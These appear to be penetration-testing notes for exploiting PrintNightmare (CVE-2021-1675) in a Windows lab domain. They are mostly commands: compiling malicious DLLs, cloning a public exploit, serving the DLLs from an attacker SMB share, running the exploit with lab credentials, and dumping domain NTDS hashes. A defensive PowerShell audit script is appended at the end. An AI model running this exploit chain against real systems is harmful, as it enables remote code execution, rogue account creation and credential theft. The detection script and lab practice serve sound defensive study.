Check whether the Print Spooler is active
cme smb 192.168.56.10-23 -M spooler
rpcdump.py @192.168.56.10 | egrep 'MS-RPRN|MS-PAR'
Get-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint' | Select-Object RestrictDriverInstallationToAdministrators
A vulnerable Point and Print configuration would be as follows.
- The setting RestrictDriverInstallationToAdministrators is set to 0, so that users can install printer drivers.
- The setting NoWarningNoElevationOnInstall is set to 1, so that no elevation prompt is shown when installing a printer driver.
Prepare Dll
/opt/Tools/active-directory/printnightmare/nightmare.c
Use this variant when the exploiting user is not added to the local Administrators group, which is usually the case on Windows Server 2019 and above
/opt/Tools/active-directory/printnightmare/adduser.c
Compile the source code files
x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c
x86_64-w64-mingw32-gcc -shared -o pnightmare2.dll adduser.c -lnetapi32
Exploit
git clone https://github.com/cube0x0/CVE-2021-1675 printnightmare
/opt/Tools/active-directory/printnightmare
Start the smbserver to serve the dll file
smbserver.py -smb2support ATTACKERSHARE .
Execute the exploit against the older server
python3 CVE-2021-1675.py essos.local/jorah.mormont:'H0nnor!'@meereen.essos.local '\\192.168.56.1\ATTACKERSHARE\nightmare.dll'
Re-execute the exploit with the adduser DLL against the newer server
python3 CVE-2021-1675.py north.sevenkingdoms.local/jon.snow:'iknownothing'@winterfell.north.sevenkingdoms.local '\\192.168.56.1\ATTACKERSHARE\pnightmare2.dll'
Get the loot
cme smb winterfell.north.sevenkingdoms.local -u pnightmare2 -p 'Test123456789!' --ntds
Cleanup
- After the exploitation you will find your DLLs inside:
C:\Windows\System32\spool\drivers\x64\3
- And also inside:
C:\Windows\System32\spool\drivers\x64\3\Old\{id}\
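Added audit script (not part of these notes or the cube0x0 project): run on a Windows host to report the three things this page relies on, whether the Spooler is running, whether the two Point and Print values form the vulnerable combination described above, and which DLLs were written recently under the spool driver directory, including the Old\{id}\ folders mentioned in the cleanup section. The 7-day lookback is an assumption.

```powershell
# Added audit script (not part of the original notes). Run as Administrator.
$PnPKey       = 'HKLM:\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$DriverDir    = "$env:SystemRoot\System32\spool\drivers\x64\3"   # recursion covers Old\{id}\
$LookbackDays = 7   # assumption: how far back to look for newly written driver DLLs

# 1. Spooler service state: without the service there is no MS-RPRN/MS-PAR exposure.
$spooler        = Get-Service -Name Spooler -ErrorAction SilentlyContinue
$spoolerRunning = ($null -ne $spooler -and $spooler.Status -eq 'Running')

# 2. Point and Print policy values; $null means the value is not configured.
$props    = Get-ItemProperty -Path $PnPKey -ErrorAction SilentlyContinue
$restrict = $props.RestrictDriverInstallationToAdministrators
$noWarn   = $props.NoWarningNoElevationOnInstall

# Vulnerable combination from the notes: Restrict... = 0 and NoWarning... = 1
$weakPointAndPrint = ($restrict -eq 0) -and ($noWarn -eq 1)

# 3. DLLs written recently anywhere under the x64 driver directory.
$since      = (Get-Date).AddDays(-$LookbackDays)
$recentDlls = @()
if (Test-Path $DriverDir) {
    $recentDlls = @(Get-ChildItem -Path $DriverDir -Filter *.dll -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -ge $since } |
        Select-Object FullName, LastWriteTime, Length)
}

[PSCustomObject]@{
    ComputerName                               = $env:COMPUTERNAME
    SpoolerRunning                             = $spoolerRunning
    RestrictDriverInstallationToAdministrators = $restrict
    NoWarningNoElevationOnInstall              = $noWarn
    WeakPointAndPrintConfig                    = $weakPointAndPrint
    RecentDriverDllCount                       = $recentDlls.Count
} | Format-List

if ($recentDlls.Count -gt 0) {
    Write-Host "`nRecently written DLLs under ${DriverDir}:"
    $recentDlls | Format-Table -AutoSize
}
```

A host showing SpoolerRunning = True, WeakPointAndPrintConfig = True and unexpected recent DLLs under the driver directory matches the conditions and artifacts described on this page and should be triaged.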